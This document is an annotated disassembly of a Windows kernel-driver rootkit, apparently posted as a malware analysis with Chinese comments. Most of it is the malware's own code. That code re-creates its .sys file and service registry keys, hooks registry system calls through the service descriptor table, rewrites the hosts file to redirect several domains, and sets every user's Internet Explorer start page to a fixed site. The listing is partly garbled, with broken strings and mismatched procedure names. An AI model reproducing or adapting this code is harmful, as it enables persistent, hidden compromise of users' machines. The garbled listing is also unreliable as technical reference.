; *************** S U B R O U T I N E ***************************************
; *************** S U B R O U T I N E ***************************************
push offset s_SystemrootS_1 ; "[url=file:////SystemRoot//system32//drivers//%s.sys]//SystemRoot//system32//drivers//%s.sys[/url]"
start proc near
AnsiString = STRING ptr -14h
SourceString = UNICODE_STRING ptr -0Ch
var_4 = dword ptr -4
DriverObject = dword ptr 8
Handle = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push edi
push [ebp+Handle]
xor edi, edi
mov [ebp+var_4], edi
call sub_11600
test eax, eax
jz short loc_11725
mov eax, 0C0000001h
jmp loc_1186F
push ebx
push esi
push 104h ; size_t
push edi ; int
push offset unk_11B30 ; void *
call memset
mov esi, 208h
push esi ; size_t
push edi ; int
mov ebx, offset word_11C38
push ebx ; void *
call memset
push esi ; size_t
push edi ; int
mov esi, offset unk_11E40
push esi ; void *
call memset
mov eax, [ebp+Handle]
movzx ecx, word ptr [eax]
push ecx ; size_t
push dword ptr [eax+4] ; void *
push esi ; void *
call memcpy
push esi ; wchar_t *
call ds:_wcslwr
push 5Ch ; wchar_t
push esi ; wchar_t *
call ds:wcsrchr
add esp, 3Ch
cmp eax, edi
jz loc_1186A
add eax, 2
push eax ; SourceString
lea eax, [ebp+SourceString]
push eax ; DestinationString
call ds:RtlInitUnicodeString
movzx eax, [ebp+SourceString.Length]
push eax ; size_t
push [ebp+SourceString.Buffer] ; void *
push ebx ; void *
call memcpy
push ebx ; wchar_t *
call ds:_wcslwr
add esp, 10h
push 1 ; AllocateDestinationString
lea eax, [ebp+SourceString]
push eax ; SourceString
lea eax, [ebp+AnsiString]
push eax ; DestinationString
call ds:RtlUnicodeStringToAnsiString
cmp eax, edi
mov [ebp+var_4], eax
jl loc_1186A
movzx eax, [ebp+AnsiString.Length]
push eax ; size_t
push [ebp+AnsiString.Buffer] ; void *
mov esi, offset unk_11B30
push esi ; void *
call memcpy
push esi ; char *
call ds:_strlwr
add esp, 10h
call GetEPAddress
mov esi, ds sCreateSystemThread
push edi ; StartContext
push offset sub_10AA8 ; StartRoutine
push edi ; ClientId
push edi ; ProcessHandle
push edi ; ObjectAttributes
mov dword_12048, eax
push edi ; DesiredAccess
lea eax, [ebp+Handle]
push eax ; ThreadHandle
call esi ; PsCreateSystemThread
push [ebp+Handle] ; Handle
mov ebx, ds:__imp_ZwClose
call ebx ; __imp_ZwClose
mov dword_12054, 1
mov dword_12050, edi
mov dword_1205C, edi
mov Handle, edi
call Test_SystemRoot
test eax, eax
jz short loc_1184D
push 1
call ReCreateSYSFile
push edi ; StartContext
push offset StartRoutine ; StartRoutine
push edi ; ClientId
push edi ; ProcessHandle
push edi ; ObjectAttributes
push edi ; DesiredAccess
lea eax, [ebp+Handle]
push eax ; ThreadHandle
call esi ; PsCreateSystemThread
push [ebp+Handle] ; Handle
call ebx ; __imp_ZwClose
jmp short loc_11860
; ---------------------------------------------------------------------------
push [ebp+DriverObject] ; DriverObject
call sub_116EF
push edi ; Remove
push offset NotifyRoutine ; NotifyRoutine
call PsSetCreateProcessNotifyRoutine
lea eax, [ebp+AnsiString]
push eax ; AnsiString
call ds:RtlFreeAnsiString
loc_1186A: ; CODE XREF: start+78j start+B9j
mov eax, [ebp+var_4]
pop esi
pop ebx
loc_1186F: ; CODE XREF: start+1Dj
pop edi
retn 8
start endp
; *************** S U B R O U T I N E ***************************************
GetEPAddress proc near
push 0Ch
push offset dword_105D0
call sub_118B0
call ds:IoGetCurrentProcess
mov ebx, eax
xor edi, edi]
mov [ebp-4], edi
mov esi, offset s_System ; "System"
mov [ebp-1Ch], edi
cmp edi, 3000h
jge short loc_10FBA
push esi ; char *
call strlen
push eax ; size_t
lea eax, [edi+ebx]
push eax ; char *
push esi ; char *
call ds:strncmp
add esp, 10h
test eax, eax
jnz short loc_10FB0
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
jmp short loc_10FC0
; ---------------------------------------------------------------------------
inc edi
jmp short loc_10F84
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
loc_10FBA: or dword ptr [ebp-4], 0FFFFFFFFh
xor eax, eax
call sub_118EB
GetEPAddress endp ; sp = -8
sub_118EB proc near
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
push ecx
sub_118EB endp
ReCreateSYSFile proc near
FileHandle = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push 104h ; size_t
lea eax, [ebp+FileHandle]
push 0 ; int
push eax ; void *
call memset
push offset unk_11B30
lea eax, [ebp+FileHandle]
push offset s_SystemrootS_1 ; "[url=file:////SystemRoot//system32//drivers//%s.sys]//SystemRoot//system32//drivers//%s.sys[/url]"
push eax ; char *
call ds:sprintf
mov esi, ds:__imp_ZwClose
add esp, 18h
cmp [ebp+arg_0], 1
jnz short loc_115D1
mov eax, Handle
test eax, eax
jz short loc_115C0
push eax ; Handle
call esi ; __imp_ZwClose
and Handle, 0
push offset dword_12050 ; int
lea eax, [ebp+FileHandle]
push eax ; FileHandle
call ReCreateFile
loc_115D1: ; CODE XREF: sub_1156A+41j
cmp [ebp+arg_0], 0
jnz short loc_115FB
mov eax, dword_12050
test eax, eax
jz short loc_115EA
push eax ; Handle
call esi ; __imp_ZwClose
and dword_12050, 0
push offset Handle ; int
lea eax, [ebp+FileHandle]
push eax ; FileHandle
call ReCreateFile
pop esi
retn 4
ReCreateSYSFile endp
sub_116EF proc near ; CODE XREF: start+14Dp
DriverObject = dword ptr 4
push 0 ; Context
push offset DriverReinitializationRoutine ; DriverReinitializationRoutine
push [esp+8+DriverObject] ; DriverObject
call ds:IoRegisterDriverReinitialization
retn 4
sub_116EF endp
; *************** S U B R O U T I N E ***************************************
; Attributes: bp-based frame
; void __stdcall sub_10AA8(PVOID)
sub_10AA8 proc near
SourceString = word ptr -37Ch
var_312 = dword ptr -312h
var_174 = byte ptr -174h
var_70 = dword ptr -70h
DestinationString= UNICODE_STRING ptr -68h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_50 = dword ptr -50h
ValueName = UNICODE_STRING ptr -48h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
ObjectAttributes= OBJECT_ATTRIBUTES ptr -30h
Interval = LARGE_INTEGER ptr -18h
var_10 = dword ptr -10h
Data = dword ptr -0Ch
var_8 = dword ptr -8
Handle = dword ptr -4
push ebp
mov ebp, esp
sub esp, 37Ch
push ebx
push esi
push edi
push 40h
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+var_174], bl
lea edi, [ebp-173h]
rep stosd
push 1Ah
pop ecx
mov esi, offset s_RegistryMachi ; /registry/machine/system/currentcontrolset/services/
lea edi, [ebp+SourceString]
rep movsd
push 67h
pop ecx
xor eax, eax
lea edi, [ebp+var_312]
rep stosd
mov edi, offset word_11C38
lea eax, [ebp+SourceString]
push edi ; wchar_t *
push eax ; wchar_t *
mov [ebp+var_8], 1
call ds:wcscat
mov esi, ds:RtlInitUnicodeString
pop ecx
pop ecx
lea eax, [ebp+SourceString]
push eax ; SourceString
lea eax, [ebp+DestinationString]
push eax ; DestinationString
call esi ; RtlInitUnicodeString
lea eax, [ebp+DestinationString]
mov [ebp+ObjectAttributes.ObjectName], eax
push offset s_Imagepath ; "ImagePath"
lea eax, [ebp+ValueName]
push eax ; DestinationString
mov [ebp+ObjectAttributes.Length], 18h
mov [ebp+ObjectAttributes.RootDirectory], ebx
mov [ebp+ObjectAttributes.Attributes], 240h
mov [ebp+ObjectAttributes.SecurityDescriptor], ebx
mov [ebp+ObjectAttributes.SecurityQualityOfService], ebx
call esi ; RtlInitUnicodeString
push offset s_Start ; "Start"
lea eax, [ebp+var_50]
push eax ; DestinationString
call esi ; RtlInitUnicodeString
push offset s_Type ; "Type"
lea eax, [ebp+var_38]
push eax ; DestinationString
call esi ; RtlInitUnicodeString
push offset s_Errorcontrol ; "ErrorControl"
lea eax, [ebp+var_58]
push eax ; DestinationString
call esi ; RtlInitUnicodeString
push offset s_Displayname ; "DisplayName"
lea eax, [ebp+var_70]
push eax ; DestinationString
call esi ; RtlInitUnicodeString
push offset s_Group ; "Group"
lea eax, [ebp+var_40]
push eax ; DestinationString
call esi ; RtlInitUnicodeString
or dword ptr [ebp+Interval+4], 0FFFFFFFFh
push offset unk_11B30
lea eax, [ebp+var_174]
push offset s_System32Drive ; "System32//DRIVERS//%s.sys"
push eax ; char *
mov dword ptr [ebp+Interval], 0FE363C80h
call ds:sprintf
add esp, 0Ch
lea eax, [ebp+var_174]
push eax ; SourceString
lea eax, [ebp+var_60]
push eax ; DestinationString
call ds:RtlInitAnsiString
push 1 ; AllocateDestinationString
lea eax, [ebp+var_60]
push eax ; SourceString
lea eax, [ebp+var_10]
push eax ; DestinationString
call ds:RtlAnsiStringToUnicodeString
test eax, eax
jl loc_10C93
mov esi, ds:__imp_ZwSetValueKey
push ebx ; Disposition
push ebx ; CreateOptions
push ebx ; Class
push ebx ; TitleIndex
lea eax, [ebp+ObjectAttributes]
push eax ; ObjectAttributes
push 2 ; DesiredAccess
lea eax, [ebp+Handle]
push eax ; KeyHandle
call ds:ZwCreateKey
test eax, eax
jl loc_10C82
;如果失败了 等待下次执行执行线程继续试着写键值
movzx eax, word ptr [ebp+var_10]
inc eax
inc eax
push eax ; DataSize
push [ebp+Data] ; Data
lea eax, [ebp+ValueName]
push 2 ; Type
push ebx ; TitleIndex
push eax ; ValueName
push [ebp+Handle] ; KeyHandle
mov [ebp+var_8], 1
call esi ; __imp_ZwSetValueKey
push 4 ; DataSize
lea eax, [ebp+var_8]
push eax ; Data
push 4 ; Type
push ebx ; TitleIndex
lea eax, [ebp+var_38]
push eax ; ValueName
push [ebp+Handle] ; KeyHandle
call esi ; __imp_ZwSetValueKey
push 4 ; DataSize
lea eax, [ebp+var_8]
push eax ; Data
push 4 ; Type
push ebx ; TitleIndex
lea eax, [ebp+var_58]
push eax ; ValueName
push [ebp+Handle] ; KeyHandle
call esi ; __imp_ZwSetValueKey
push edi ; wchar_t *
call ds:wcslen
pop ecx
shl eax, 1
push eax ; DataSize
push edi ; Data
push 1 ; Type
push ebx ; TitleIndex
lea eax, [ebp+var_70]
push eax ; ValueName
push [ebp+Handle] ; KeyHandle
call esi ; __imp_ZwSetValueKey
push offset s_SystemBusExte ; "System Bus Extender"
call ds:wcslen
pop ecx
shl eax, 1
push eax ; DataSize
push offset s_SystemBusExte ; "System Bus Extender"
;设置 组为System Bus Extender
push 1 ; Type
push ebx ; TitleIndex
lea eax, [ebp+var_40]
push eax ; ValueName
push [ebp+Handle] ; KeyHandle
call esi ; __imp_ZwSetValueKey
push 4 ; DataSize
lea eax, [ebp+var_8]
push eax ; Data
push 4 ; Type
push ebx ; TitleIndex
lea eax, [ebp+var_50]
push eax ; ValueName
push [ebp+Handle] ; KeyHandle
mov [ebp+var_8], ebx
call esi ; __imp_ZwSetValueKey
push [ebp+Handle] ; Handle
call ds:__imp_ZwClose
loc_10C82: lea eax, [ebp+Interval]
push eax ; Interval
push ebx ; Alertable
push ebx ; WaitMode
call ds:KeDelayExecutionThread
jmp loc_10BCF
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
retn 4
sub_10AA8 endp
; *************** S U B R O U T I N E ***************************************
; Attributes: bp-based frame
; void __stdcall StartRoutine(PVOID)
StartRoutine proc near
Interval = LARGE_INTEGER ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
or dword ptr [ebp+Interval+4], 0FFFFFFFFh
mov dword ptr [ebp+Interval], 0FE363C80h
call Hook_System_Service
call Write_Bad_Host;
; 9505.com
; www.9505.com
; 4199.com
; www.4199.com
; www.arswp.com
push offset s_Www_feixue_ne ; www.feixue.net
call Write_StartPage
lea eax, [ebp+Interval]
push eax ; Interval
push 0 ; Alertable
push 0 ; WaitMode
call ds:KeDelayExecutionThread
jmp short loc_111AB
StartRoutine endp
; *************** S U B R O U T I N E ***************************************
Hook_System_Service proc near
call sub_11368
test eax, eax
jnz short loc_10ED5
; ---------------------------------------------------------------------------
loc_10ED5: ; CODE XREF: sub_10ECB+7j
push ebx
push ebp
push esi
mov esi, ds:__imp_ZwOpenKey
push edi
push esi
call sub_11466
;先Hook ZwOpenKey函数
mov edi, ds:__imp_ZwSetValueKey
push edi
mov off_11900, eax
call sub_11466
;Hook ZwSetValueKey函数
mov ebx, ds:__imp_ZwEnumerateKey
push ebx
mov off_11908, eax
call sub_11466
;Hook ZwEnumerateKey函数
mov ebp, ds:__imp_ZwClose
push ebp
mov off_1190C, eax
call sub_11466
;Hook ZwClose函数
mov off_11904, eax
call sub_114A0
xor eax, eax
cmp off_11900, eax
jz short loc_10F47
cmp off_11908, eax
jz short loc_10F47
cmp off_1190C, eax
jz short loc_10F47
cmp off_11904, eax
jz short loc_10F47
inc eax
jmp short loc_10F61
; ---------------------------------------------------------------------------
mov off_11900, esi
mov off_11904, ebp
mov off_11908, edi
mov off_1190C, ebx
xor eax, eax
pop edi
pop esi
pop ebp
pop ebx
sub_10ECB endp
sub_11466 proc near
arg_0 = dword ptr 4
mov eax, BaseAddress
test eax, eax
jz short locret_1149D
mov ecx, [esp+arg_0]
mov ecx, [ecx+1]
test ch, 30h
push esi
jnz short loc_1149A
push ecx
push eax
push dword_1191C
call sub_10E71
mov esi, eax
push esi ; VirtualAddress
call ds:MmIsAddressValid
test al, al
jz short loc_1149A
mov eax, esi
jmp short loc_1149C
; ---------------------------------------------------------------------------
xor eax, eax
pop esi
locret_1149D: retn 4
sub_11466 endp
sub_10E71 proc near
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push edi
mov edi, [ebp+arg_4]
push edi
xor ebx, ebx
call sub_10E60
test eax, eax
jz short loc_10EC5
push esi
push eax
push edi
call sub_10CE7
mov esi, eax
test esi, esi
jz short loc_10EC4
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_8]
push eax
push edi
call sub_10C9A
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
lea eax, [esi+eax*4]
add eax, edi
mov eax, [eax]
sub eax, [ecx+1Ch]
cmp eax, [ecx+38h]
jnb short loc_10EC2
mov ecx, [ebp+arg_0]
lea ebx, [eax+ecx]
loc_10EC2: ; CODE XREF: sub_10E71+49j
mov eax, ebx
loc_10EC4: ; CODE XREF: sub_10E71+22j
pop esi
loc_10EC5: ; CODE XREF: sub_10E71+14j
pop edi
pop ebx
retn 0Ch
sub_10E71 endp
sub_10E60 proc near
arg_0= dword ptr 4
push offset s_Keservicedesc ; "KeServiceDescriptorTable"
;push KeServiceDescriptorTable..
push [esp+4+arg_0]
call sub_10DE9
retn 4
sub_10E60 endp
*************** S U B R O U T I N E ***************************************
; Attributes: bp-based frame
sub_107BD proc near
FileInformation = dword ptr -5Ch
var_54 = dword ptr -54h
ObjectAttributes= OBJECT_ATTRIBUTES ptr -44h
var_2C = dword ptr -2Ch
DestinationString= UNICODE_STRING ptr -24h
IoStatusBlock = _IO_STATUS_BLOCK ptr -1Ch
FileHandle = dword ptr -14h
var_10 = dword ptr -10h
Length = dword ptr -0Ch
P = dword ptr -8
Handle = dword ptr -4
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push offset SourceString ; "[url=file:////SystemRoot//system32//drivers//etc//hosts]//SystemRoot//system32//drivers//etc//hosts[/url]"
lea eax, [ebp+DestinationString]
push eax ; DestinationString
call ds:RtlInitUnicodeString
push 18h
pop esi
xor ebx, ebx
push ebx ; EaLength
push ebx ; EaBuffer
push 60h ; CreateOptions
push 1 ; CreateDisposition
push 3 ; ShareAccess
push 80h ; FileAttributes
lea eax, [ebp+DestinationString]
mov [ebp+ObjectAttributes.ObjectName], eax
push ebx ; AllocationSize
lea eax, [ebp+IoStatusBlock]
push eax ; IoStatusBlock
lea eax, [ebp+ObjectAttributes]
push eax ; ObjectAttributes
push 100003h ; DesiredAccess
lea eax, [ebp+Handle]
push eax ; FileHandle
mov [ebp+ObjectAttributes.Length], esi
mov [ebp+ObjectAttributes.RootDirectory], ebx
mov [ebp+ObjectAttributes.Attributes], 240h
mov [ebp+ObjectAttributes.SecurityDescriptor], ebx
mov [ebp+ObjectAttributes.SecurityQualityOfService], ebx
mov [ebp+Handle], ebx
call ds:ZwCreateFile
test eax, eax
jl loc_109CC
cmp dword ptr [ebp+IoStatusBlock.anonymous_0], ebx
jl loc_109CC
push 5 ; FileInformationClass
push esi ; FileInformationLength
lea eax, [ebp+FileInformation]
push eax ; FileInformation
lea eax, [ebp+IoStatusBlock]
push eax ; IoStatusBlock
push [ebp+Handle] ; FileHandle
mov [ebp+P], ebx
call ds:ZwQueryInformationFile
test eax, eax
jl loc_109AB
mov eax, [ebp+var_54]
cmp eax, 20h
mov [ebp+Length], eax
jbe loc_109AB
push edi
mov edi, ds:ExAllocatePoolWithTag
inc eax
mov esi, 206B6444h
push esi ; Tag
push eax ; NumberOfBytes
push ebx ; PoolType
mov [ebp+var_10], eax
call edi ; ExAllocatePoolWithTag
cmp eax, ebx
mov [ebp+P], eax
jz loc_109AA
push [ebp+var_10] ; size_t
push ebx ; int
push eax ; void *
call memset
add esp, 0Ch
push ebx ; Key
push ebx ; ByteOffset
push [ebp+Length] ; Length
lea eax, [ebp+IoStatusBlock]
push [ebp+P] ; Buffer
push eax ; IoStatusBlock
push ebx ; ApcContext
push ebx ; ApcRoutine
push ebx ; Event
push [ebp+Handle] ; FileHandle
call ds:ZwReadFile
cmp eax, ebx
mov ecx, [ebp+Length]
mov edx, [ebp+P]
mov [ecx+edx], bl
jl loc_109AA
cmp [ebp+IoStatusBlock.Information], ecx
jnz loc_109AA
push offset s_Feixue ; "feixue"
push edx ; int
call sub_10771
test eax, eax
jnz short loc_108DC
push offset s_Piaoxue ; "piaoxue"
push [ebp+P] ; int
call sub_10771
test eax, eax
jz loc_109AA
Write_Bad_host: ; CODE XREF: sub_107BD+108j
push [ebp+var_10] ; size_t
push ebx ; int
push [ebp+P] ; void *
call memset
push 8 ; size_t
lea eax, [ebp+var_2C]
push ebx ; int
push eax ; void *
call memset
add esp, 18h
push 0Eh ; FileInformationClass
push 8 ; FileInformationLength
lea eax, [ebp+var_2C]
push eax ; FileInformation
lea eax, [ebp+IoStatusBlock]
push eax ; IoStatusBlock
push [ebp+Handle] ; FileHandle
call ds:ZwSetInformationFile
test eax, eax
jl loc_109AA
push esi ; Tag
mov esi, 100h
push esi ; NumberOfBytes
push ebx ; PoolType
call edi ; ExAllocatePoolWithTag
mov edi, eax
cmp edi, ebx
jz short loc_10976
push esi ; size_t
push ebx ; int
push edi ; void *
call memset
push offset s_222_88_90_229 ; " 9505.com"
push offset s_222_88_90_22W ; "
push offset s_222_88_90_224 ; " 4199.com"
push offset s_222_88_90_2_0 ; "
push offset s_127_0_0_1Www_ ; "
push offset s_SSSSS ; "%s/r/n%s/r/n%s/r/n%s/r/n%s/r/n"
; 这里就是要修改的HOSTS表内容!!
; 有猫腻的!!
push edi ; char *
call ds:sprintf
add esp, 28h
push ebx ; Key
push ebx ; ByteOffset
push edi ; char *
call strlen
pop ecx
push eax ; Length
push edi ; Buffer
lea eax, [ebp+IoStatusBlock]
push eax ; IoStatusBlock
push ebx ; ApcContext
push ebx ; ApcRoutine
push ebx ; Event
push [ebp+Handle] ; FileHandle
call ds:ZwWriteFile
push edi ; P
call ds:ExFreePool
loc_10976: ; CODE XREF: sub_107BD+165j
push [ebp+Handle] ; Handle
call ds:__imp_ZwClose
push ebx ; EaLength
push ebx ; EaBuffer
push 40h ; CreateOptions
push 1 ; CreateDisposition
push 1 ; ShareAccess
push 80h ; FileAttributes
push ebx ; AllocationSize
lea eax, [ebp+IoStatusBlock]
push eax ; IoStatusBlock
lea eax, [ebp+ObjectAttributes]
push eax ; ObjectAttributes
push 80000000h ; DesiredAccess
lea eax, [ebp+FileHandle]
push eax ; FileHandle
mov [ebp+Handle], ebx
mov [ebp+FileHandle], ebx
call ds:ZwCreateFile
loc_109AA: ; CODE XREF: sub_107BD+B6j
; sub_107BD+ECj sub_107BD+F5j
; sub_107BD+119j sub_107BD+151j
pop edi
loc_109AB: ; CODE XREF: sub_107BD+87j
; sub_107BD+96j
cmp [ebp+Handle], ebx
jz short loc_109B9
push [ebp+Handle] ; Handle
call ds:__imp_ZwClose
loc_109B9: ; CODE XREF: sub_107BD+1F1j
cmp [ebp+P], ebx
jz short loc_109C7
push [ebp+P] ; P
call ds:ExFreePool
loc_109C7: ; CODE XREF: sub_107BD+1FFj
xor eax, eax
inc eax
jmp short loc_109CE
; ---------------------------------------------------------------------------
loc_109CC: ; CODE XREF: sub_107BD+5Fj
; sub_107BD+68j
xor eax, eax
loc_109CE: ; CODE XREF: sub_107BD+20Dj
pop esi
pop ebx
Write_Bad_host endp
; *************** S U B R O U T I N E ***************************************
; Attributes: bp-based frame
; int __stdcall sub_11074(PCSZ SourceString)
Write_StartPage proc near
ObjectAttributes= OBJECT_ATTRIBUTES ptr -30h
DestinationString= UNICODE_STRING ptr -18h
ResultLength = dword ptr -10h
Handle = dword ptr -0Ch
Index = dword ptr -8
P = dword ptr -4
SourceString = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push offset s_RegistryUser ; "[url=file:////registry//user]//registry//user[/url]"
;要写入的是 User部分!
lea eax, [ebp+DestinationString]
push eax ; DestinationString
call ds:RtlInitUnicodeString
lea eax, [ebp+DestinationString]
mov [ebp+ObjectAttributes.ObjectName], eax
lea eax, [ebp+ObjectAttributes]
push eax ; ObjectAttributes
xor esi, esi
push 0F003Fh ; DesiredAccess
lea eax, [ebp+Handle]
push eax ; KeyHandle
mov [ebp+ObjectAttributes.Length], 18h
mov [ebp+ObjectAttributes.RootDirectory], esi
mov [ebp+ObjectAttributes.Attributes], 240h
mov [ebp+ObjectAttributes.SecurityDescriptor], esi
mov [ebp+ObjectAttributes.SecurityQualityOfService], esi
call off_11900
test eax, eax
jl loc_11189
push ebx
mov ebx, ds:ExAllocatePoolWithTag
push edi
mov [ebp+ResultLength], esi
mov edi, 206B6444h
push edi ; Tag
mov [ebp+Index], esi
mov esi, 200h
push esi ; NumberOfBytes
push 1 ; PoolType
call ebx ; ExAllocatePoolWithTag
test eax, eax
mov [ebp+P], eax
jz loc_1117E
push edi ; Tag
mov edi, 400h
push edi ; NumberOfBytes
push 1 ; PoolType
call ebx ; ExAllocatePoolWithTag
mov ebx, eax
test ebx, ebx
jz short loc_11175
push esi ; size_t
push 0 ; int
push [ebp+P] ; void *
call memset
add esp, 0Ch
lea eax, [ebp+ResultLength]
push eax
push esi
push [ebp+P]
push 0
push 0
jmp short loc_11161
; ---------------------------------------------------------------------------
loc_1111A: ; CODE XREF: sub_11074+F8j
push edi ; size_t
push 0 ; int
push ebx ; void *
call memset
mov eax, [ebp+P]
add eax, 10h
push eax
push offset s_RegistryUserW ; "registry/user/%ws/Software/Microsoft/Internet Explorer/Main"...
;registry/user/%ws/Software/Microsoft/Internet Explorer/Main
push edi ; size_t
push ebx ; wchar_t *
call ds:_snwprintf
add esp, 1Ch
push [ebp+SourceString] ; SourceString
push ebx ; Handle
call sub_10FC6
;这个子程序就是在写Main里面的 StartPage了!
inc [ebp+Index]
push esi ; size_t
push 0 ; int
push [ebp+P] ; void *
call memset
add esp, 0Ch
lea eax, [ebp+ResultLength]
push eax ; ResultLength
push esi ; KeyInformationLength
push [ebp+P] ; KeyInformation
push 0 ; KeyInformationClass
push [ebp+Index] ; Index
loc_11161: ; CODE XREF: sub_11074+A4j
push [ebp+Handle] ; KeyHandle
call off_1190C
test eax, eax
jge short loc_1111A
push ebx ; P
call ds:ExFreePool
loc_11175: ; CODE XREF: sub_11074+88j
push [ebp+P] ; P
call ds:ExFreePool
loc_1117E: ; CODE XREF: sub_11074+73j
push [ebp+Handle] ; Handle
call off_11904
pop edi
pop ebx
loc_11189: ; CODE XREF: sub_11074+4Aj
xor eax, eax
inc eax
pop esi
retn 4
Wrtie_StartPage endp